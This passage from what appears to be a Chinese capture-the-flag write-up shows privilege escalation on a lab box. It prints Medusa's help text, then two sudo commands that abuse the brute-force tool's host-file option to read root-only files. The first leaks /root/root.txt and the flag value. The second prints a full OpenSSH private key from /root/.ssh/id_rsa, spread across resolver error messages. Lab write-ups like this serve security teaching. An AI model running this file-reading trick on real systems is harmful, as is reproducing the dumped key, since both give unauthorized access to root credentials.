Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] -h [TEXT] : Target hostname or IP address -H [FILE] : File containing target hostnames or IP addresses -u [TEXT] : Username to test -U [FILE] : File containing usernames to test -p [TEXT] : Password to test -P [FILE] : File containing passwords to test -C [FILE] : File containing combo entries. See README for more information. -O [FILE] : File to append log information to -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username) -M [TEXT] : Name of the module to execute (without the .mod extension) -m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.) -d : Dump all known modules -n [NUM] : Use for non-default TCP port number -s : Enable SSL -g [NUM] : Give up after trying to connect for NUM seconds (default 3) -r [NUM] : Sleep NUM seconds between retry attempts (default 3) -R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1. -c [NUM] : Time to wait in usec to verify socket is available (default 500 usec). -t [NUM] : Total number of logins to be tested concurrently -T [NUM] : Total number of hosts to be tested concurrently -L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding. -f : Stop scanning host after first valid username/password found. -F : Stop audit after first valid username/password found on any host. -b : Suppress startup banner -q : Display module's usage information -v [NUM] : Verbose level [0 - 6 (more)] -w [NUM] : Error debug level [0 - 10 (more)] -V : Display version -Z [TEXT] : Resume scan based on map of previous scan
两种方法
第一种 直接用 medusa 读 flag 文件
sudo /usr/bin/medusa -H /root/root.txt -u u -p p -M ssh
拿到 flagflag{2d0ceefcc3a0476dd92c0b6a9a046490}
第二种 用 medusa 读取 id_rsa 文件
sudo /usr/bin/medusa -H /root/.ssh/id_rsa -u u -p p -M ssh
jojo@Basic:/usr/bin$ sudo /usr/bin/medusa -H /root/.ssh/id_rsa -u u -p p -M ssh Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
CRITICAL: Failed to resolve hostname: -----BEGIN OPENSSH PRIVATE KEY----- - Name or service not known CRITICAL: Failed to resolve hostname: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn - Name or service not known CRITICAL: Failed to resolve hostname: NhAAAAAwEAAQAAAYEAuo7fDpWRyh52wo83HNHA5DwnBTEx1Y/hs7jnh5GCIBMxK9kg0A9d - Name or service not known CRITICAL: Failed to resolve hostname: aKHnmsDfnG22fr9ZB3XGDJjZpg86E4MGmzXAQ2FMZfcy0vJ90CIQ4kKrvzj2XvWpu+BkMZ - Name or service not known CRITICAL: Failed to resolve hostname: ibARGcZa0hzOk+RtbFnWGWWOUx0cTtNiEEWx3v43k8ELG1guQ4PU0jIlV6D70F2R9P6tfn - Name or service not known CRITICAL: Failed to resolve hostname: BOxr88YSnSsQu0RErnfg+TR2Vs1EGBpC2vY9yhQOn2X3XeCL2ewznq21DLojMkeW/1lyPn - Name or service not known CRITICAL: Failed to resolve hostname: j/isRTkYXToi+qG+B5KheUtJSGcXb9YMDM4kbCJ0EzRY2lkcZ8Lu8c+6Xyr46nzCKLcx4l - Name or service not known CRITICAL: Failed to resolve hostname: o13VHNraz6nA1gZZJCOhsaX8h7qdDp4bFFAkDEsIEdWJn3oygQ6HuddXfqlJ+lxw6+ANRw - Name or service not known CRITICAL: Failed to resolve hostname: jeGQoLCKj1ut0y5AbFmXvNY+DqaFiQr1YbvuWfm7L2l53ca3HMkK0HytG0o7VzAkyLGUpZ - Name or service not known CRITICAL: Failed to resolve hostname: yv+sF4sspTwdxT7UBt8RVmdOBdU8KhwOgqojj0+rAAAFgCbRPJIm0TySAAAAB3NzaC1yc2 - Name or service not known CRITICAL: Failed to resolve hostname: EAAAGBALqO3w6VkcoedsKPNxzRwOQ8JwUxMdWP4bO454eRgiATMSvZINAPXWih55rA35xt - Name or service not known CRITICAL: Failed to resolve hostname: tn6/WQd1xgyY2aYPOhODBps1wENhTGX3MtLyfdAiEOJCq7849l71qbvgZDGYmwERnGWtIc - Name or service not known CRITICAL: Failed to resolve hostname: zpPkbWxZ1hlljlMdHE7TYhBFsd7+N5PBCxtYLkOD1NIyJVeg+9BdkfT+rX5wTsa/PGEp0r - Name or service not known CRITICAL: Failed to resolve hostname: ELtERK534Pk0dlbNRBgaQtr2PcoUDp9l913gi9nsM56ttQy6IzJHlv9Zcj54/4rEU5GF06 - Name or service not known CRITICAL: Failed to resolve hostname: IvqhvgeSoXlLSUhnF2/WDAzOJGwidBM0WNpZHGfC7vHPul8q+Op8wii3MeJaNd1Rza2s+p - Name or service not known CRITICAL: Failed to resolve hostname: wNYGWSQjobGl/Ie6nQ6eGxRQJAxLCBHViZ96MoEOh7nXV36pSfpccOvgDUcI3hkKCwio9b - Name or service not known CRITICAL: Failed to resolve hostname: rdMuQGxZl7zWPg6mhYkK9WG77ln5uy9ped3GtxzJCtB8rRtKO1cwJMixlKWcr/rBeLLKU8 - Name or service not known CRITICAL: Failed to resolve hostname: HcU+1AbfEVZnTgXVPCocDoKqI49PqwAAAAMBAAEAAAGBALdrFJ9QKqBfxz+Ocw8gotdC1N - Name or service not known CRITICAL: Failed to resolve hostname: JkBa0E41FB8FD3nMpQVD3aIkqtcJcY547dJnyz2YNQOgX9oxRri0GbIuxgHDSpajhVBzoR - Name or service not known CRITICAL: Failed to resolve hostname: CqUfyNbDR3pNNnKxXHkMay7OdXPVqEAqwmutBthiUdpv+qa7dYg8/vhQ9zAK0i+LhXlOju - Name or service not known CRITICAL: Failed to resolve hostname: GS9vST0T9kAbEV/QZQP9my0W4Bi57pm1F3YoGn/7E+c5BdSJF7JQY+lj5kQ2roQuPVSHMr - Name or service not known CRITICAL: Failed to resolve hostname: W0OvK5C8jBvsiV7T+xrKClt9OEseNufcUUA5iaKI+G4qwx3znjt548FxxF6q2Jlp5pEThP - Name or service not known CRITICAL: Failed to resolve hostname: AMBPFQvb99HL3MNF/paO2lczp9Jl5puiHOAUBF7lAgGsIYPU3wo5GaWl3IEYnfn7lXziB8 - Name or service not known CRITICAL: Failed to resolve hostname: iVkP0K/gx4yauF159H4IMP7pmh0rDRxLdW2h2GCc2vspJpD9mQ8dBemG+6fUHTJzfgFwR0 - Name or service not known CRITICAL: Failed to resolve hostname: eTHDHJtzj5q5yK4g/5zaRS8+Vx4iTBYw/aBzWr1WkP4OkmLWyx6NZXzEkw/MxdJyF/oQAA - Name or service not known CRITICAL: Failed to resolve hostname: AMAchGFcfzr4d/Rv+Q1eaFzNVGFVAmiW2H2Sz9lOZAXw/jARJww9B3Zg3M9q+b5w4SVMeQ - Name or service not known CRITICAL: Failed to resolve hostname: HJYjgWPy97/KkQZR5U4MC8Ds7zyQY3AhlqJvcDIZeTFMXt44qWmaKiQy2KciVIW30+UAtO - Name or service not known CRITICAL: Failed to resolve hostname: GOBqPoykzbwgLmh5hJmQGpgzssgMhOM7hIcRMP/Ymhsyw8ok9++FEqSN9mUiXSGR7WbGke - Name or service not known CRITICAL: Failed to resolve hostname: esb99CYOsc7YCJ0EeZJJEhQIxwFg094NDCjK83j5yOrDssfNIAAADBAN83PifBNXGdRFN0 - Name or service not known CRITICAL: Failed to resolve hostname: nF5r4QSW1wDQ0CHHOZt0zXYbpjyxASFhtTWfEci5AXWz9jL4qFCLBx77jNfabalhRPlz8E - Name or service not known CRITICAL: Failed to resolve hostname: 8Gavf8rssqD8+ZcHr/bAPSlfxY9Q+5L6FKAdKl7x70qNiYp7btyAuGFWKfn+lH4sSFCVBA - Name or service not known CRITICAL: Failed to resolve hostname: MSDsXSQvL5bB6CGFLASboZJLNYO+0iYJ5nGZch+B3HQQ+sk52A3ipR5Om1Trk+ZelV5iH7 - Name or service not known CRITICAL: Failed to resolve hostname: uMDrSz1Co+0ozDPmfvo9PGrttYqmPpaQAAAMEA1fVTHfJmX8vv4IGthLzeWaosc90bjiMY - Name or service not known CRITICAL: Failed to resolve hostname: 70FX+KImdoi26V61rccY2IBL6X4KffrL1jTuET12czbwGgZh3KpHbFrXNsc/jxV+sUKVJa - Name or service not known CRITICAL: Failed to resolve hostname: aKLFd+UNjg756RvevzBMXr5c9ewE6hcdNiwKDBxkBqSbuiBr+oeSMg0G4ppwCGg+G0lBd/ - Name or service not known CRITICAL: Failed to resolve hostname: ltoRV5MXeIxoYZ6B/jrAbc/Y9kQZ0ozcoSe3zMViGiY++TQf2TPkhiBvu8bRY4vy19nl1c - Name or service not known CRITICAL: Failed to resolve hostname: mM/HtQ/t5mUZnzAAAACnJvb3RAQmFzaWM= - Name or service not known CRITICAL: Failed to resolve hostname: -----END OPENSSH PRIVATE KEY----- - Name or service not known jojo@Basic:/usr/bin$